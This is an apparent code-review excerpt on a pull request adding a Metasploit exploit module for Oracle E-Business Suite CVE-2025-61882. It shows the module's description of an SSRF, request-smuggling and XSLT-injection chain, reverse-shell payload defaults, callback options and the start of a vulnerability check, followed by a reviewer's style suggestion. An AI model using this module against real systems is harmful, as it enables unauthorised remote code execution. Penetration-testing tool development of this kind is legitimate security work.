modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb

```diff
@@ -0,0 +1,427 @@
+        'Description' => %q{
+          This module exploits CVE-2025-61882 in Oracle E-Business Suite
+          by combining SSRF, Path Traversal, HTTP request smuggling and XSLT injection.
+
+          The exploit hosts a malicious XSL file
+          that the target will fetch and process, leading to RCE.
+
+          This module provides an interactive shell session.
+          Vulnerable versions affected are 12.2.3-12.2.14.
+        },
+        'Author' => [
+          'watchTowr (Sonny, Sina Kheirkhah, Jake Knott)', # Original Python POC and blog Article
+          'Mathieu Dupas' # Metasploit module development
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-61882'],
+          ['URL', 'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/' ],
+          ['URL', 'https://www.oracle.com/security-alerts/alert-cve-2025-61882.html']
+        ],
+        'Platform' => ['unix', 'linux', 'win'],
+        'Targets' => [
+          [
+            'Linux/Unix (Interactive Shell)',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Windows (Interactive Shell)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/reverse_powershell'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-10-04',
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
+          # Handler delay
+          'WfsDelay' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8000),
+      OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
+      OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
+      OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
+      OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
+      OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30]),
+    ])
+  end
+
+  def check
+
+    vprint_status("Checking if target is vulnerable...")
+
+    unless oracle_ebs_detected?
+      return CheckCode::Safe
+    end
+
+    csrf_token = retrieve_csrf_token
+    unless csrf_token
+      return CheckCode::Unknown
+    end
```

Comment:
```suggestion
    return CheckCode::Safe unless oracle_ebs_detected?

    csrf_token = retrieve_csrf_token
    return CheckCode::Unknown unless csrf_token
```

Idiomatic ruby, yay!